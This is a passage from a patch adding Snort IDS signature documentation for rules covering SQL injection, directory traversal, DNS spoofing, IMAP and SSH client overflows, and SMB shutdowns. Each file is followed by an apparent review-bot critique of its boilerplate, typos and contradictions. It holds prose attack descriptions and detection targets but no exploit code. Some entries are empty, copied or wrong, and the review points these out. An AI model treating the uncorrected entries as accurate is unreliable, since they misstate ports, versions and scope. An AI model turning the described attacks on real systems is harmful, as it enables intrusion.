+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
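Review bot: Attack Scenarios is the generic authentication boilerplate (`An attacker can access an authentication mechanism and supply his/her own credentials`) and does not match Detailed Information, which describes PHP code execution, file inclusion and retrieval of sensitive files from Advanced Poll 2.0.2. Rewrite the scenario around the input-handling flaw. A specific product and version are named, so Additional References should not be empty; add the vendor or advisory link for the issue.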
--- /dev/null
+++ b/doc/signatures/100000472.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000472
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "show.php" with SQL commands being passed as the "MAINID" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "MAINID" parameter in the "show.php" script used by the 
+"VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
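Review bot: the third Detailed Information paragraph (`This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials ...`) is the shared CGI-authentication boilerplate and says nothing about SQL injection; the two paragraphs before it and Attack Scenarios already cover the issue, so drop it. Typos: `ona web server` and `an exploitation attempt has been attempted`. The `--` after `100000472`, after the Affected Systems line and after the contributors lack the blank line used in the other files.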
--- /dev/null
+++ b/doc/signatures/1468.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1468
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
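Review bot: this file is word for word the same as 1410.txt apart from the Sid line, so it carries no information about what sid 1468 actually detects (`a known vulnerability in a CGI web application`, `All systems running CGI applications`). Name the script and parameter the rule matches and add a reference; the `ona web server` typo has been copied over as well.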
--- /dev/null
+++ b/doc/signatures/507.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+507
+
+--
+Summary:
+This event is generated when an attempt is made to gain administrative 
+rights to a PC running pcAnywhere
+
+--
+Impact:
+Serious. By the very nature of pcAnywhere, without a strong administrative
+password, a successful attack will allow the attacker to gain total 
+control of the machine.
+
+--
+Detailed Information:
+pcAnywhere is a remote control administrative software package produced 
+by Symantec (http://www.symantec.com/pcanywhere/Consumer/features.html) 
+it allows control of a system via network or RAS connection.
+
+--
+Affected Systems:
+	Windows XP Home and Professional
+	Windows 2000 Professional/Server
+	Windows NT Workstation and Server 4.0
+	Windows 98/Me
+
+--
+Attack Scenarios:
+With a copy of pcAnywhere, and attacker can scan a network (port 22) or
+war-dial a series of modems, looking for pcAnywhere signatures.
+
+--
+Ease of Attack:
+Simple. All that is required is an install of pcAnywhere and a host
+to connect to.
+
+--
+False Positives:
+Since pcAnywhere uses the same port as SSH (22) a simple open port scan 
+can show hosts that my not have pcAnywhere installed
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Make sure only servers and workstations that require remote control have
+pcAnywhere installed.
+Make sure that a strong password is required for any level of access, 
+this ideally should be coupled with some for of alternate 
+authentication, such as SecurID, modem callback or be blocked at the 
+external firewall so that the remote control functionality is only 
+available on the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by  Mike Rivett ebiz@rivett.org
+
+-- 
+Additional References:
+Symantec PC Anywhere Home Page
+http://www.symantec.com/pcanywhere/Consumer/
+
+RSA:
+RSA SecurID (www.rsasecurity.com/products/securid/)
+
+Arachnids:
+http://www.whitehats.com/info/IDS240
+
+--
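Review bot: the port statements need a transport protocol and a version. `pcAnywhere uses the same port as SSH (22)` and `scan a network (port 22)` read as TCP/22, which is SSH; pcAnywhere's default data channel is TCP 5631 with status on UDP 5632, and only older releases used UDP/22 for status, so a TCP open-port scan does not show pcAnywhere hosts as the False Positives section implies. Check the port against the rule and state protocol and version explicitly. Grammar: `and attacker can scan` (an attacker), `hosts that my not have` (may not), `some for of alternate authentication` (some form of), and the Summary lacks a full stop.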
--- /dev/null
+++ b/doc/signatures/119-18.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+119-18
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Directory traversal outside the root directory of a web server.
+
+--
+Detailed Information:
+This event is generated when the http_inspect pre-processor detects an
+attempt to escape the root directory of a web server by an attacker
+using a directory traversal technique.
+
+--
+Affected Systems:
+	All web servers.
+
+--
+Attack Scenarios: 
+An attacker may employ a directory traversal technique to escape the
+root directory of a web server in an attempt to access protected system
+files.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
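Review bot: the Summary (`detects network traffic that may constitute an attack`) is the generic preprocessor wording and says nothing about this event; it should state that the alert fires when the request URI, after http_inspect normalisation, resolves to a path above the web server's document root. `False Positives: None Known.` is hard to defend for a normalisation-based alert; note that applications or proxies that emit more `..` segments than the path has directories will trigger it even though the server rejects the request.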
--- /dev/null
+++ b/doc/signatures/1040.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1040
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential 
+weakness on a host running Microsoft Internet Information Server (IIS) 
+using the Indexing service. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential 
+weaknesses in a host running Microsoft IIS using the Indexing service.
+
+The attacker may be trying to gain information on the IIS implementation 
+on the host, this may be the prelude to an attack against that host 
+using that information.
+
+This event is generated when an attempt is made to access srchadm, a
+directory used by the Microsoft Index Server.
+
+--
+Affected Systems:
+Any host using IIS and the Index service.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the 
+IIS implementation. The attacker might then gain administrator access to
+the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been 
+taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
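Review bot: Attack Scenarios escalates well beyond what Impact states. Impact is `Information gathering.` and the Summary describes access to the `srchadm` directory, yet Attack Scenarios says the attacker `might then gain administrator access to the site, deface the content or gain access to a database`, none of which the rest of the text supports. Either scope the scenario to reconnaissance of the Index Server administration interface or justify the escalation. The product is called both `Indexing service` and `Microsoft Index Server`; pick one. Additional References is empty for a product-specific rule.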
--- /dev/null
+++ b/doc/signatures/254.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+254
+
+--
+Summary:
+This event is generated when a specific DNS response is returned. In this case, there are no DNS authority records for the queried address record and has a DNS time-to-live value of one minute. 
+
+--
+Impact:
+Ranges from harmless to severe.  A successful corrupted DNS IP and name pairing can range from harmless (if the IP is not used) to severe (if a user is misdirected to a hostile IP).
+
+--
+Detailed Information:
+This is presumably from an attacker engaged in a race condition to respond to a legitimate DNS query.  An attacker may sniff a DNS query requeting an address record and attempt to respond before an actual DNS server can.  The spoofed response is atypical because it does not include the authoritative DNS servers in the returned record.  A legitimate DNS response will likely return the names of the authoritative DNS servers.  The response associated with this traffic has a DNS time-to-live value of one minute.  It is suspected that the TTL is set to expire quickly to eliminate any evidence of the spoofed response.
+
+--
+Affected Systems:
+Any DNS server not using DNSSEC.
+
+--
+Attack Scenarios:
+An attacker can spoof a DNS response to misrepresent a host name to IP pairing.  The forged IP number can direct a user to a potentially hostile IP address.
+
+--
+Ease of Attack:
+The attacker has to be able to sniff DNS queries and generate spoofed responses before the actual DNS server.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+This rule uses very specific DNS flag values that could be modified.  Also, if the DNS TTL value is changed from 1, this rule will not trigger.
+
+--
+Corrective Action:
+Consider using DNSSEC where appropriate.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
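Review bot: The TTL in Summary and Detailed Information ("a DNS time-to-live value of one minute") does not agree with False Negatives ("if the DNS TTL value is changed from 1, this rule will not trigger"); a one-minute TTL is 60 on the wire, so one of the two must be corrected to match what the rule checks. Also fix "requeting" in Detailed Information, and the subject mismatch in the Summary sentence "there are no DNS authority records for the queried address record and has a DNS time-to-live value of one minute" (suggest "and the response has a DNS time-to-live value of one minute"). Affected Systems says "Any DNS server not using DNSSEC", but the party harmed by a spoofed response is the resolver or client that accepts it, as Impact describes ("a user is misdirected"); name those instead.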
--- /dev/null
+++ b/doc/signatures/1942.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid: 
+1942
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or it could be an attempt to compromise the FTP server by overflowing a buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
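Review bot: The Affected Systems section is missing; the template used by the other files in this patch places it between Detailed Information and Attack Scenarios, so add it (for example "Any host running an FTP server"). The Summary ("spurious ftp traffic") and Detailed Information never say what the rule matches (a file name, a command, an overlong argument), so the "None Known" False Positives claim cannot be evaluated; state the matched content. In Corrective Action, "Use secure shell (ssh) to transfer files" should name the file transfer tools carried over SSH (scp or sftp), since ssh itself is a remote shell.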
--- /dev/null
+++ b/doc/signatures/2237.txt
@@ -0,0 +1,47 @@
+Rule:  
+
+--
+Sid:
+2237
+
+--
+Summary:
+This event is generated when an attempt is made to 
+
+--
+Impact:
+
+--
+Detailed Information:
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
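Review bot: The Summary is cut off mid-sentence ("This event is generated when an attempt is made to ") and Impact, Detailed Information, Affected Systems, Attack Scenarios and Ease of Attack are all empty, so the file documents nothing; Corrective Action ("Upgrade to the latest non-affected version of the software") does not even name the software. Complete the sections from the rule's msg and reference fields, or drop doc/signatures/2237.txt from the patch rather than ship an empty template.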
--- /dev/null
+++ b/doc/signatures/1786.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+
+1786
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "raw sex".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "raw sex".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+--
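Review bot: "a webpage was visited the included the content" in the Summary should read "that included the content". The layout also diverges from the other files in this patch: the Sid value is separated from "Sid:" by a blank line, several headings are followed by a blank line before their text, "None known." in False Negatives runs straight into "--" without the blank separator, and "etc.etc." in False Positives should be dropped or replaced by a sentence. The Summary opens with "This rule indicates" where every other file uses "This event is generated when"; align it.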
--- /dev/null
+++ b/doc/signatures/1161.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1161
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
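Review bot: "running ona web server" in Detailed Information should be "running on a web server", and "attackers choosing" (Impact and Detailed Information) should be "attacker's choosing". More substantively, nothing in the file identifies the PHP application or the vulnerability SID 1161 matches; the text is the same generic credential and input validation boilerplate as 863.txt later in this patch with "CGI" swapped for "PHP", so an analyst cannot tell what was requested. Name the script the rule looks for in Summary and Detailed Information and add a reference under Additional References, which is empty.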
--- /dev/null
+++ b/doc/signatures/1867.txt
@@ -0,0 +1,61 @@
+Nigel - added new references to the rule and bumped up revision number.
+Rule:
+
+--
+Sid:
+1867
+
+--
+Summary:
+This event is generated when a remote user attempts to query the X Display Manager Control Protocol (XDMCP).
+
+--
+Impact:
+Reconnaissance.  An attacker may obtain a list of usernames on the remote host.
+
+--
+Detailed Information:
+The KDE Display Manager (KDM) provides a network protocol XDMCP to supply a graphical login screen.  It is possible to use this protocol to list the users on the remote host running XDMCP.  This provides reconnaissance and may be a precursor of attempting a brute force password attack of the revealed usernames.
+
+--
+Affected Systems:
+Any host running XDMCP.
+
+--
+Attack Scenarios:
+An attacker may obtain a list of current usernames on the remote host as a precursor of attempting a brute force attack to guess passwords of those users.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Block inbound XDMCP traffic.
+
+Disable XDMCP as a listening service on the remote host unless it is required.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS476
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10891
+
+--
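Review bot: The first line of the file, "Nigel - added new references to the rule and bumped up revision number.", is an editorial note to a colleague and should be removed; it sits above "Rule:" and would be shown verbatim to anyone reading the signature documentation. Detailed Information attributes XDMCP to "The KDE Display Manager (KDM)", while the Summary correctly expands it as the X Display Manager Control Protocol, which is not specific to KDM; reword so the protocol is not presented as a KDM feature. False Positives says "None." where the other files use "None Known."; align it.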
--- /dev/null
+++ b/doc/signatures/1838.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid: 1838
+
+--
+Summary:
+Secure Shell (SSH) is used to remotely manage systems over encrypted TCP
+sessions. This event is generated when an attempt is made to exploit 
+vulnerable versions of the SecureCRT SSH client.
+
+--
+Impact:
+System compromize presenting the attacker with either the opportunity to
+execute arbitrary code or crash the client.
+
+--
+Detailed Information:
+Van Dyke Technologies SecureCRT is a client program that allows users to
+connect to servers running the Secure Shell (SSH) daemon for remote 
+access via an encrypted TCP session.
+
+A flaw in the SecureCRT client may result in arbitrary code execution 
+with the privileges of the user running the client.
+
+A buffer overflow can be caused by a server sending an overly long 
+identifier string when using the SSH-1 protocol.
+
+--
+Affected Systems:
+	Van Dyke Technologies SecureCRT prior to version 4.0 beta 1
+
+Not affected:
+	Van Dyke Technologies SecureCRT versions 3.2.2, 3.3.4, 3.4.6 and 4.0 beta 3.
+
+--
+Attack Scenarios:
+The attacker would need to send overly large SSH version 1 identifier 
+string to cause the overflow.
+
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Securityfocus:
+http://www.securityfocus.com/bid/5287
+
+--
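Review bot: Affected Systems and Not affected contradict each other: "SecureCRT prior to version 4.0 beta 1" is listed as affected, yet 3.2.2, 3.3.4 and 3.4.6, all prior to 4.0 beta 1, are listed as not affected. Presumably the fixed release of each branch is meant; state the affected versions per branch (for example "versions before 3.2.2, 3.3.4, 3.4.6 and 4.0 beta 3") so the two lists agree. Also "compromize" in Impact should be "compromise", "Sid: 1838" should put the number on its own line as the other files do, and "Exploit scripts are available" needs a terminating period. Since Detailed Information says the overflow is triggered by the server's identifier string, Attack Scenarios should state that the threat is a malicious or compromised SSH server the client connects to.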
--- /dev/null
+++ b/doc/signatures/1842.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1842
+
+--
+Summary:
+This event is generated when a remote attacker sends a malformed
+argument in the LOGIN command to an internal IMAP server, indicating an
+attempt to exploit a buffer overflow vulnerability in Netscape Messaging
+Server and University of Washington IMAP implementations. This may also
+affect other IMAP server implementations.
+
+--
+Impact:
+Remote execution of arbitrary code with the security privileges of the
+IMAP process, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+A buffer overflow vulnerability exists in the LOGIN command in
+University of Washington IMAP and Netscape Messaging Server. This can
+allow a remote attacker to send an LOGIN command with a malformed,
+overlong argument to a vulnerable IMAP server, causing a buffer overflow
+condition. The attacker can then execute arbitrary code on the server
+with the security privileges of the IMAP server process.     
+
+--
+Affected Systems:
+	Netscape Messaging Server 3.55 and earlier
+	University of Washington imapd 10.234 and earlier.
+	Ipswitch iMail 5.0
+
+--
+Attack Scenarios:
+An attacker sends an overly long, malformed argument to an LOGIN command
+to a vulnerable IMAP server, causing a buffer overflow condition. The
+attacker is then able to execute arbitrary code on the server with the
+security privileges of the IMAP server process.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Patches have been released for both UW IMAP and Netscape Messaging
+Server. Apply the patch or upgrade to a Netscape Messaging Server
+version higher than 3.55 or UW IMAP version higher than 10.234.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/130
+
+--
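Review bot: Affected Systems lists "Ipswitch iMail 5.0", but Summary, Detailed Information and Corrective Action only discuss Netscape Messaging Server and University of Washington imapd, so no remediation is given for iMail; add it (with a reference) or drop iMail from the list. "an LOGIN command" appears in both Detailed Information and Attack Scenarios and should be "a LOGIN command". There is trailing whitespace after "IMAP server process." in Detailed Information, and the "Bugtraq" heading under Additional References is not preceded by the blank line the other files use.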
--- /dev/null
+++ b/doc/signatures/2518.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2518
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of the Private
+Communications Transport (PCT) protocol.
+
+--
+Impact:
+Execution of arbitrary code. Unauthorized administrative access to an
+affected host.
+
+--
+Detailed Information:
+A vulnerability exists in the handling of PCT requests that
+can be manipulated to give an attacker the opportunity to execute
+arbitrary code of their choosing leading to a possible remote
+administrative compromize of an affected host.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003 and XP systems using PCT
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted PCT request to an affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the use of PCT
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
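Review bot: Additional References is empty although Detailed Information describes a flaw in the Microsoft SSL library's PCT handling; cite the Microsoft security bulletin for this issue so an analyst can find the patch that Corrective Action tells them to apply. Spelling: "compromize" in Detailed Information and "attcker" in Attack Scenarios. The two Corrective Action lines ("Apply the appropriate vendor supplied patches", "Disable the use of PCT") lack terminating periods, and the second should say where PCT is disabled on the affected systems, otherwise the advice is not actionable.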
--- /dev/null
+++ b/doc/signatures/2997.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2997
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
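Review bot: Impact reads only "Serious." while Detailed Information already gives the concrete consequence ("Shutting down a system may lead to a Denial of Service for the target host"); put that in Impact so the field is informative. Attack Scenarios escalates to "The attacker may gain complete control over the affected system" without anything in the text supporting it; either explain what about a shutdown request implies that, or limit the scenario to the denial of service described above. The Corrective Action item "Disallow remote registry manipulation." is not connected to anything else in the file; explain why it applies to SMB shutdown requests or drop it.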
--- /dev/null
+++ b/doc/signatures/2170.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2170
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
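Review bot: Detailed Information says the rule fires on "a filename extension commonly used by viruses" but never names the extension, so this document is indistinguishable from 2168.txt later in this patch, whose text is identical apart from the SID; each file should state the extension its rule matches, and False Positives should then name the legitimate use of that extension. Grammar in Impact: "An virus" should be "A virus" and "propogate" should be "propagate". There is a stray second blank line after the Sid value.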
--- /dev/null
+++ b/doc/signatures/554.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+554
+
+--
+Summary: 
+This event is generated when an attempt is made to create a directory name that begins with a "/ " on an FTP server.
+
+
+--
+Impact: 
+Unauthorized file storage.  An attacker may attempt to create a directory name that begins with "/ " on an FTP server, possibly in preparation to store unauthorized files.
+
+--
+Detailed Information: 
+An attacker may attempt to create a hidden directory name that begins with "/ " on an FTP server .  This hidden directory is hard to discover, permitting attackers to store unauthorized "warez" files, such as unlicensed or pirated software.
+
+--
+Affected Systems: 
+FTP servers
+
+--
+Attack Scenarios: 
+An attacker may attempt to create a hidden directory name that begins with "/ " to store unauthorized files.
+
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives: 
+None Known.
+
+--
+False Negatives: 
+Hidden directories other than those with a name that begins with a "/ " may be created to store "warez" files.
+
+--
+Corrective Action: 
+Assign restrictive permissions to all directories so unauthorized users cannot navigate or write to them.
+
+Regularly monitor directories for sudden or drastic increased use of space.
+
+--
+Contributors: 
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+-- 
+Additional References:
+
+--
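Review bot: The text quotes the directory name as beginning with "/ " (slash followed by a space) but never names the FTP command the rule matches, so an analyst cannot reproduce the detection from the document; state the command in Summary and Detailed Information. "on an FTP server ." in Detailed Information has a space before the period. Given the False Negatives note that other hidden directory names are possible, Corrective Action could add auditing the FTP directory tree for names beginning with unusual characters, not only monitoring disk usage.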
--- /dev/null
+++ b/doc/signatures/100000539.txt
